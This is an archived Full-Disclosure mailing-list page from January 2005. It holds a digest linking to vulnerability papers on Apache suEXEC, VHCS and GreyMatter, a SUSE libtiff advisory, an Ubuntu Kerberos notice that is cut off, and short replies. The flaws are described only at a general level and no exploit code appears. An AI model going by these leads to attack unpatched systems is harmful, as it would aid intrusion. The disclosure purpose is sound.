NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Full-Disclosure> 2005-01

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/octet-stream attachment: I_search_for_you.com

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Kernelpanik Labs Digest 2005-1

From: Kernelpanik Labs - Security Lists (seclistskernelpanik.org)
Date: Mon Jan 10 2005 - 03:53:16 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi and happy new year.

This is a email digest with security fails recently published by
Kernelpanik Labs (http://www.kernelpanik.org)

Apache suEXEC Bypass
--------------------
Small document about how bypass isolating
procedures, i.e. suEXEC, in Apache WebServer.
English document: http://www.kernelpanik.org/docs/kernelpanik/suexec.en.pdf
Spanish document: http://www.kernelpanik.org/docs/kernelpanik/suexec.es.pdf
Author: frame at kernelpanik.org

Amphora Gate StandAlone
-----------------------
Security fails in this captive portal
Spanish document:
http://www.kernelpanik.org/docs/kernelpanik/amphora.pdf
Author: madj0ker at kernelpanik.org

Virtual Hosting Control System v2.2
-----------------------------------
Remote code execution in this control panel
Spanish document:
http://www.kernelpanik.org/docs/kernelpanik/vhcs22.txt
English document: http://www.kernelpanik.org/docs/kernelpanik/vhcs22.en.txt
Author: frame at kernelpanik.org

GreyMatter 1.3
--------------
Some security fails: race condition and XSS's
Spanish document:
http://www.kernelpanik.org/docs/kernelpanik/greym13.txt
English document: http://www.kernelpanik.org/docs/kernelpanik/greym13.en.txt
Author: frame at kernelpanik.org

That's is all.

PD1: MaDj0kEr won't translate his stuff to shakespeare language 'cause
don't think anyone there uses amphora.

PD2: If you learn spanish, you'll avoid our scary translations and enjoy
more our jokes.

PD3: Dunno why people in securityfocus block our email... so from now,
we'll send advisories to both lists.

--
Kernelpanik Labs - kpkkernelpanik.org
http://www.kernelpanik.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] SUSE Security Announcement: libtiff/tiff (SUSE-SA:2005:001)

From: Thomas Biege (thomassuse.de)
Date: Mon Jan 10 2005 - 04:36:46 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

SUSE Security Announcement

        Package: libtiff/tiff
        Announcement-ID: SUSE-SA:2005:001
        Date: Monday, Jan 10th 2005 11:30 MET
        Affected products: 8.1, 8.2, 9.0, 9.1, 9.2
                                SUSE Linux Desktop 1.0
                                SUSE Linux Enterprise Server 8, 9
                                Novell Linux Desktop 9
        Vulnerability Type: remote system compromise
        Severity (1-10): 8
        SUSE default package: yes
        Cross References: CAN-2004-1183
                                CAN-2004-1308

    Content of this advisory:
        1) security vulnerability resolved:
             - integer overflow
             - buffer overflow
           problem description
        2) solution/workaround
        3) special instructions and notes
        4) package location and checksums
        5) pending vulnerabilities, solutions, workarounds:
        6) standard appendix (further information)

______________________________________________________________________________

1) problem description, brief discussion

    Libtiff supports reading, writing, and manipulating of TIFF image files.
    iDEFENSE reported an integer overflow in libtiff that can be exploited by
    specific TIFF images to trigger a heap-based buffer overflow afterwards.

    This bug can be used by external attackers to execute arbitrary code
    over the network by placing special image files on web-pages and
    alike.

    Additionally a buffer overflow in tiffdump was fixed.


2) solution/workaround

    There is no workaround known.


3) special instructions and notes

    It is needed that all processes using libtiff are restarted.
    If you use GUI applications please close your X/GDM/KDM session(s) and
    log in again.


4) package location and checksums

    Download the update package for your distribution and verify its
    integrity by the methods listed in section 3) of this announcement.
    Then, install the package using the command "rpm -Fhv file.rpm" to apply
    the update.
    Our maintenance customers are being notified individually. The packages
    are being offered for installation from the maintenance web.

x86 Platform:

SUSE Linux 9.2:
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/libtiff-3.6.1-47.4.i586.rpm
8d0c9a4295719b7b659d33b311932cce
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/libtiff-devel-3.6.1-47.4.i586.rpm
bbdfe23b8390265f62c5e800551eca7d
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/tiff-3.6.1-47.4.i586.rpm
79d0b122103b619b795872ed70a7feaa
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/libtiff-3.6.1-47.4.i586.patch.rpm
dd18c32e661a59dfda88e5318ecfb825
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/libtiff-devel-3.6.1-47.4.i586.patch.rpm
a161f078c72920fde4f95f0f229e07fb
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/tiff-3.6.1-47.4.i586.patch.rpm
b66e77ac565b375555f9b980145a9442
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/tiff-3.6.1-47.4.src.rpm
953f00dd4f98223d270db6e2c662e370

SUSE Linux 9.1:
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/libtiff-3.6.1-38.14.i586.rpm
bc883989e3deeecbc0dfb47a9daa23ff
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/tiff-3.6.1-38.14.i586.rpm
46a598e4914836b7e4e90094625e1587
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/libtiff-3.6.1-38.14.i586.patch.rpm
ec8d13d5b0bb4bedb2796db800ec8821
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/tiff-3.6.1-38.14.i586.patch.rpm
8bfef59cd1946f889f9eb3b8f441e61a
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/tiff-3.6.1-38.14.src.rpm
59218891e1c096ee376aec6906dbbc1c

SUSE Linux 9.0:
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/libtiff-3.5.7-379.i586.rpm
339b3bbc318cc6298e07a65e82a1e07d
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/tiff-3.5.7-379.i586.rpm
6fe1432237f589dc73e348e1cdbc9068
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/libtiff-3.5.7-379.i586.patch.rpm
867a5a98a2ac68071be51a2426992bd9
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/tiff-3.5.7-379.i586.patch.rpm
a185bec3b9a4a79590561d2bd7d19243
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/tiff-3.5.7-379.src.rpm
a4857a276db37e3a6d4fc6df2bebd230

SUSE Linux 8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/libtiff-3.5.7-379.i586.rpm
aab8d95cf757c5520830e0bed74e2d5f
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/tiff-3.5.7-379.i586.rpm
5ded8ffdd7633ce5a68a231d637f6247
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/libtiff-3.5.7-379.i586.patch.rpm
566e39a22033284c1266c52eac7320d3
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/tiff-3.5.7-379.i586.patch.rpm
40521831ae56bdabde85ee92473697c5
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/tiff-3.5.7-379.src.rpm
f407a1cfca26d9618d19848b087983ee

SUSE Linux 8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/libtiff-3.5.7-379.i586.rpm
36ec66df028b5d24f8373282a32f1440
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/tiff-3.5.7-379.i586.rpm
7e5b60fd51d14eac8312474f2d43cda0
patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/libtiff-3.5.7-379.i586.patch.rpm
41959759027005e272103b07054c6e26
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/tiff-3.5.7-379.i586.patch.rpm
0ae11b9367fe84085aacd6ed1b586bff
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/tiff-3.5.7-379.src.rpm
b9d1ac1c51f9f935ca78628d8d2adc3e

x86-64 Platform:

SUSE Linux 9.2:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/libtiff-32bit-9.2-200501041820.x86_64.rpm
d22303573664d8ef0170c1da81a65232
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/libtiff-32bit-9.2-200501041820.x86_64.rpm
d22303573664d8ef0170c1da81a65232
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/libtiff-devel-3.6.1-47.4.x86_64.rpm
27a98a68b4bda3096f6263998c41d29d
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/tiff-3.6.1-47.4.x86_64.rpm
d9f2938c822fa2131a3b2a1c4b471376
patch rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/libtiff-32bit-9.2-200501041820.x86_64.patch.rpm
f52f8c1a562151373ee98c14e22a6107
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/libtiff-32bit-9.2-200501041820.x86_64.patch.rpm
f52f8c1a562151373ee98c14e22a6107
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/libtiff-devel-3.6.1-47.4.x86_64.patch.rpm
cb8f1590ecc0b7ef89eeca271ab7a5c7
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/tiff-3.6.1-47.4.x86_64.patch.rpm
e49a2d960381dea99758b7c8d34df07f
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/src/tiff-3.6.1-47.4.src.rpm
953f00dd4f98223d270db6e2c662e370

SUSE Linux 9.1:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/libtiff-3.6.1-38.14.x86_64.rpm
01f564b510e02b71ed23146358b6488a
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/tiff-3.6.1-38.14.x86_64.rpm
b9fbc56e9f2250ec222c87f8a3805252
patch rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/libtiff-3.6.1-38.14.x86_64.patch.rpm
813bcb747d11c80ddc30c9de98dbd344
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/tiff-3.6.1-38.14.x86_64.patch.rpm
2a6c5c2923d9709904cdef560c996fb9
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/tiff-3.6.1-38.14.src.rpm
506ec05d53f1bc266263aa76086d8af9

SUSE Linux 9.0:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/libtiff-3.5.7-379.x86_64.rpm
29e8cfa5fd6725ea02d66e43a2abeafb
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/tiff-3.5.7-379.x86_64.rpm
b5bccb1560f75b5fd9dd827bdc2f6424
patch rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/libtiff-3.5.7-379.x86_64.patch.rpm
e64cdac3e6a86404d17807e12c4f7098
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/tiff-3.5.7-379.x86_64.patch.rpm
9e5eb1bfc586805c8e1f65002b82234c
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/tiff-3.5.7-379.src.rpm
b406b3a976b892afb572be9907ab2df0

______________________________________________________________________________

5) pending vulnerabilities in SUSE Distributions and Workarounds:

Please read our next summary report for more information.

______________________________________________________________________________

6) standard appendix: authenticity verification, additional information

- Package authenticity verification:

    SUSE update packages are available on many mirror ftp servers all over
    the world. While this service is being considered valuable and important
    to the free and open source software community, many users wish to be
    sure about the origin of the package and its content before installing
    the package. There are two verification methods that can be used
    independently from each other to prove the authenticity of a downloaded
    file or rpm package:
    1) md5sums as provided in the (cryptographically signed) announcement.
    2) using the internal gpg signatures of the rpm package.

    1) execute the command
        md5sum <name-of-the-file.rpm>
       after you downloaded the file from a SUSE ftp server or its mirrors.
       Then, compare the resulting md5sum with the one that is listed in the
       announcement. Since the announcement containing the checksums is
       cryptographically signed (usually using the key securitysuse.de),
       the checksums show proof of the authenticity of the package.
       We recommend against subscribing to security lists that cause the
       e-mail message containing the announcement to be modified
       so that the signature does not match after transport through the mailing
       list software.
       Downsides: You must be able to verify the authenticity of the
       announcement in the first place. If RPM packages are being rebuilt
       and a new version of a package is published on the ftp server, all
       md5 sums for the files are useless.

    2) rpm package signatures provide an easy way to verify the authenticity
       of an rpm package. Use the command
        rpm -v --checksig <file.rpm>
       to verify the signature of the package, where <file.rpm> is the
       file name of the rpm package that you have downloaded. Of course,
       package authenticity verification can only target an uninstalled rpm
       package file.
       Prerequisites:
        a) gpg is installed
        b) The package is signed using a certain key. The public part of this
           key must be installed by the gpg program in the directory
           ~/.gnupg/ under the user's home directory who performs the
           signature verification (usually root). You can import the key
           that is used by SUSE in rpm packages for SUSE Linux by saving
           this announcement to a file ("announcement.txt") and
           running the command (do "su -" to be root):
            gpg --batch; gpg < announcement.txt | gpg --import
           SUSE Linux distributions version 7.1 and thereafter install the
           key "buildsuse.de" upon installation or upgrade, provided that
           the package gpg is installed. The file containing the public key
           is placed at the top-level directory of the first CD (pubring.gpg)
           and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .

- SUSE runs two security mailing lists to which any interested party may
subscribe:

    suse-securitysuse.com
        - general/linux/SUSE security discussion.
            All SUSE security announcements are sent to this list.
            To subscribe, send an email to
                <suse-security-subscribesuse.com>.

    suse-security-announcesuse.com
        - SUSE's announce-only mailing list.
            Only SUSE's security announcements are sent to this list.
            To subscribe, send an email to
                <suse-security-announce-subscribesuse.com>.

    For general information or the frequently asked questions (faq)
    send mail to:
        <suse-security-infosuse.com> or
        <suse-security-faqsuse.com> respectively.

    =====================================================================
    SUSE's security contact is <securitysuse.com> or <securitysuse.de>.
    The <securitysuse.de> public key is listed below.
    =====================================================================
______________________________________________________________________________

    The information in this advisory may be distributed or reproduced,
    provided that the advisory is not modified in any way. In particular,
    it is desired that the clear-text signature shows proof of the
    authenticity of the text.
    SUSE Linux AG makes no warranties of any kind whatsoever with respect
    to the information contained in this security advisory.

Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <securitysuse.de>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <buildsuse.de>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.7 (GNU/Linux)

mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA
BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz
JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh
1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U
P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+
cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg
VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b
yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7
tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ
xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63
Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo
choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI
BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u
v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+
x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0
Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq
MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2
saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o
L0oixF12CohGBBARAgAGBQI7HmHDAAoJEJ5A4xAACqukTlQAoI4QzP9yjPohY7OU
F7J3eKBTzp25AJ42BmtSd3pvm5ldmognWF3Trhp+GYkAlQMFEDe3O8IWkDf+zvyS
FQEBAfkD/3GG5UgJj18UhYmh1gfjIlDcPAeqMwSytEHDENmHC+vlZQ/p0mT9tPiW
tp34io54mwr+bLPN8l6B5GJNkbGvH6M+mO7R8Lj4nHL6pyAv3PQr83WyLHcaX7It
Klj371/4yzKV6qpz43SGRK4MacLo2rNZ/dNej7lwPCtzCcFYwqkiiEYEEBECAAYF
AjoaQqQACgkQx1KqMrDf94ArewCfWnTUDG5gNYkmHG4bYL8fQcizyA4An2eVo/n+
3J2KRWSOhpAMsnMxtPbBiEYEExECAAYFAkGJG+YACgkQGsiRhDTRlzm8CQCg14Wz
vg6j45e/r1oyt9EaHhleSacAnA+2dArk1I3xt49Z5rdnhqheF//9mQGiBDnu9IER
BACT8Y35+2vv4MGVKiLEMOl9GdST6MCkYS3yEKeueNWc+z/0Kvff4JctBsgs47tj
miI9sl0eHjm3gTR8rItXMN6sJEUHWzDP+Y0PFPboMvKx0FXl/A0dM+HFrruCgBlW
t6FA+okRySQiliuI5phwqkXefl9AhkwR8xocQSVCFxcwvwCglVcOQliHu8jwRQHx
lRE0tkwQQI0D+wfQwKdvhDplxHJ5nf7U8c/yE/vdvpN6lF0tmFrKXBUX+K7u4ifr
ZlQvj/81M4INjtXreqDiJtr99Rs6xa0ScZqITuZC4CWxJa9GynBED3+D2t1V/f8l
0smsuYoFOF7Ib49IkTdbtwAThlZp8bEhELBeGaPdNCcmfZ66rKUdG5sRA/9ovnc1
krSQF2+sqB9/o7w5/q2qiyzwOSTnkjtBUVKn4zLUOf6aeBAoV6NMCC3Kj9aZHfA+
ND0ehPaVGJgjaVNFhPi4x0e7BULdvgOoAqajLfvkURHAeSsxXIoEmyW/xC1sBbDk
DUIBSx5oej73XCZgnj/inphRqGpsb+1nKFvF+rQoU3VTRSBQYWNrYWdlIFNpZ25p
bmcgS2V5IDxidWlsZEBzdXNlLmRlPohcBBMRAgAcBQI57vSBBQkDwmcABAsKAwQD
FQMCAxYCAQIXgAAKCRCoTtronIAKyl8sAJ98BgD40zw0GHJHIf6dNfnwI2PAsgCg
jH1+PnYEl7TFjtZsqhezX7vZvYCIRgQQEQIABgUCOnBeUgAKCRCeQOMQAAqrpNzO
AKCL512FZvv4VZx94TpbA9lxyoAejACeOO1HIbActAevk5MUBhNeLZa/qM2JARUD
BRA6cGBvd7LmAD0l09kBATWnB/9An5vfiUUE1VQnt+T/EYklES3tXXaJJp9pHMa4
fzFa8jPVtv5UBHGee3XoUNDVwM2OgSEISZxbzdXGnqIlcT08TzBUD9i579uifklL
snr35SJDZ6ram51/CWOnnaVhUzneOA9gTPSr+/fT3WeVnwJiQCQ30kNLWVXWATMn
snT486eAOlT6UNBPYQLpUprF5Yryk23pQUPAgJENDEqeU6iIO9Ot1ZPtB0lniw+/
xCi13D360o1tZDYOp0hHHJN3D3EN8C1yPqZd5CvvznYvB6bWBIpWcRgdn2DUVMmp
U661jwqGlRz1F84JG/xe4jGuzgpJt9IXSzyohEJB6XG5+D0BiF0EExECAB0FAjxq
qTQFCQoAgrMFCwcKAwQDFQMCAxYCAQIXgAAKCRCoTtronIAKyp1fAJ9dR7saz2KP
NwD3U+fy/0BDKXrYGACfbJ8fQcJqCBQxeHvt9yMPDVq0B0W5Ag0EOe70khAIAISR
0E3ozF/la+oNaRwxHLrCet30NgnxRROYhPaJB/Tu1FQokn2/Qld/HZnh3TwhBIw1
FqrhWBJ7491iAjLR9uPbdWJrn+A7t8kSkPaF3Z/6kyc5a8fas44ht5h+6HMBzoFC
MAq2aBHQRFRNp9Mz1ZvoXXcI1lk1l8OqcUM/ovXbDfPcXsUVeTPTtGzcAi2jVl9h
l3iwJKkyv/RLmcusdsi8YunbvWGFAF5GaagYQo7YlF6UaBQnYJTM523AMgpPQtsK
m9o/w9WdgXkgWhgkhZEeqUS3m5xNey1nLu9iMvq9M/iXnGz4sg6Q2Y+GqZ+yAvNW
jRRou3zSE7Bzg28MI4sAAwYH/2D71Xc5HPDgu87WnBFgmp8MpSr8QnSs0wwPg3xE
ullGEocolSb2c0ctuSyeVnCttJMzkukL9TqyF4s/6XRstWirSWawJxRLKH6Zjo/F
aKsshYKf8gBkAaddvpl3pO0gmUYbqmpQ3xDEYlhCeieXS5MkockQ1sj2xYdB1xO0
ExzfiCiscUKjUFy+mdzUsUutafuZ+gbHog1CN/ccZCkxcBa5IFCHORrNjq9pYWlr
xsEn6ApsG7JJbM2besW1PkdEoxak74z1senh36m5jQvVjA3U4xq1wwylxadmmJaJ
HzeiLfb7G1ZRjZTsB7fyYxqDzMVul6o9BSwO/1XsIAnV1uuITAQYEQIADAUCOe70
kgUJA8JnAAAKCRCoTtronIAKyksiAJsFB3/77SkH3JlYOGrEe1Ol0JdGwACeKTtt
geVPFB+iGJdiwQlxasOfuXyITAQYEQIADAUCPGqpWQUJCgCCxwAKCRCoTtronIAK
yofBAKCSZM2UFyta/fe9WgITK9I5hbxxtQCfX+0ar2CZmSknn3coSPihn1+OBNw=
=Fv2n
- -----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2-rc1-SuSE (GNU/Linux)

iQEVAwUBQeJZXney5gA9JdPZAQHuhQf8CiQ6/4mIzbaqmUWjP7TREsy2j7riyM2+
dkyiCE4luNDVcAJahGQUtjwDwzEcJjeBNsuIX7vYiW0ct9ZlVDZupDQtmE83K8p4
ke76sEBKtxHvkl0MQdqsQAdEKMorPWCHdivmWp9om9Ob572uc2EM9mQl/SiJg+c9
Wp6Dl0okfuB/YDZKaeBaZr9rTceso+Fj5+OEzUkq8AuFwF/vcdTYFryX+Qh3X5Zw
PA9LGqtsWh5zviIg985wbm1axKyVgI89+VZXC9gibIR4NtdHcVpw25I+6FM4ElhA
rRVXTQm2kimxbZv1BBnkupUDtJ5va+3NwMZzG254e+7OYmcvoTyynw==
=5xrJ
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

From: Vincent Archer (vardeny-all.com)
Date: Mon Jan 10 2005 - 05:02:50 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Sat, Jan 08, 2005 at 01:57:58PM -0500, Matt Ostiguy wrote:
> On Sat, 8 Jan 2005 10:12:23 -0600, RandallM <randallmfidmail.com> wrote:
> > I don't think it's going to be free. While doing a small amount of research
> > on the "spyware community" I found this text string in the
> > GianttAntiSpywareUpdater.exe:
>
> Doesn't the fact that the executable's name contains a company that no
> longer exists (Giant) indicate that perhaps this BETA software will
> undergo some changes before its full release as a Microsoft product?

If you're optimistic, you might think that basically, they began with
a globale search-n-replace on all occurence of the old product name,
and replaced it with Microsoft's new name :)

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Kernelpanik Labs Digest 2005-1

From: André Malo (ndperlig.de)
Date: Mon Jan 10 2005 - 05:12:09 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

* Kernelpanik Labs - Security Lists wrote:

> Apache suEXEC Bypass
> --------------------
> Small document about how bypass isolating
> procedures, i.e. suEXEC, in Apache WebServer.
> English document:
> http://www.kernelpanik.org/docs/kernelpanik/suexec.en.pdf Spanish
> document: http://www.kernelpanik.org/docs/kernelpanik/suexec.es.pdf
> Author: frame at kernelpanik.org

FUD. This document just shows, that one can read world readable files in the
filesystem. Nice try...

nd
--
Winnetous Erbe: <http://pub.perlig.de/books.html#apache2>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [USN-58-1] MIT Kerberos server vulnerability

From: Martin Pitt (martin.pittcanonical.com)
Date: Mon Jan 10 2005 - 07:46:58 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

===========================================================
Ubuntu Security Notice USN-58-1 January 10, 2005
krb5 vulnerability
CAN-2004-1189
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

krb5-admin-server
krb5-kdc
libkadm55
libkrb53

The problem can be corrected by upgrading the affected package to
version 1.3.4-3ubuntu0.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Michael Tautschnig discovered a possible buffer overflow in the
add_to_history() function in the MIT Kerberos 5 implementation.
Performing a password change did not properly track the password
policy's history count and the maximum number of keys. This could
cause an array overflow and may have allowed authenticated users (not
necessarily one with administrative privileges) to execute arbitrary
code on the KDC host, compromising an entire Kerberos realm.

Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.3.4-3ubuntu0.1.diff.gz
      Size/MD5: 660788 a3e773e901a67368f8dd322a903f7f81
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.3.4-3ubuntu0.1.dsc
      Size/MD5: 788 e9baf1ebfa972d585f829d7e64465bea
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.3.4.orig.tar.gz
      Size/MD5: 6361011 23ddf1655f7f180835cf34d104088473

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5-doc_1.3.4-3ubuntu0.1_all.deb
Size/MD5: 716542 5b8265007cf5f2176955aacfe3eb45eb

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-admin-server_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 103764 7f4720f5b36e50c49f30bc99917dc31a
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-clients_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 215204 30b4d7e2a133cce888127798b843566a
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-ftpd_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 55802 92a9097d2c5fc574d644dd062a2a2d0c
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-kdc_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 123580 977b0f8def9a58ab022a2e8321f5d29d
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-rsh-server_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 81578 58fa9d55d6316f1540d642696509e04b
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-telnetd_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 62318 ae6908459976878856a666950f2c956d
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-user_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 135856 0012a1ff533388ec7a6a4082f9eaa23a
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkadm55_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 176484 e26c41328f72a6b4ff3f9dfd16819429
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-dev_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 651556 c41b666bd8ba980bb5240c8de4a22a42
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb53_1.3.4-3ubuntu0.1_amd64.deb
      Size/MD5: 367872 7c2ddc51d5fb971540aa2ddb74e136d0

i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-admin-server_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 92828 40b738af512065868c3bd38a86652ee0
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-clients_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 186464 a2da914f916c3bf6b53d1c417e74b5cf
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-ftpd_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 50728 c53fab7706867bfd2e2defaaca0e8aba
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-kdc_1.3.4-3ubuntu0.1_i386.deb
